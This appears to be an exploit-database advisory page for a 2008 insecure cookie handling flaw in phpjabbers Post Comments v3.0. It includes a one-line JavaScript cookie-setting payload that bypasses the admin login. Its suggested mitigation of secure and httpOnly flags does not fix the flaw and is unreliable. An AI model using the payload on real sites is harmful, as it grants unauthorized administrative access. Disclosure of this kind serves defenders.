header-logo
Suggest Exploit
vendor:
Post Comments
by:
Crackers_Child
7.5
CVSS
HIGH
Insecure Cookie Handling
614
CWE
Product Name: Post Comments
Affected Version From: 3
Affected Version To: 3
Patch Exists: NO
Related CWE: N/A
CPE: a:phpjabbers.com:post_comments:3.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Post Comments v3.0 Insecure Cookie Handling Vulnerability

Post Comments v3.0 is vulnerable to insecure cookie handling. An attacker can exploit this vulnerability by setting the PostCommentsAdmin cookie to 'logged' and setting the path to '/'. This will allow the attacker to gain access to the admin panel.

Mitigation:

Ensure that cookies are set with the 'secure' flag and that the 'httpOnly' flag is set to prevent access to the cookie from client-side scripts.
Source

Exploit-DB raw data:

Post Comments v3.0 Insecure Cookie Handling Vulnerability
****************************
By Crackers_Child
****************************
Demo : http://www.phpjabbers.com/post-comment/try/admin.php

Vendor :   by phpjabbers.com

Exploit : javascript:document.cookie = "PostCommentsAdmin=logged; path=/";
****************************
Tum Musluman Aleminin Ramazan Bayrami Kutlu Olsun.
****************************

# milw0rm.com [2008-09-29]

Navigation

Suggest Exploit

Services By CQR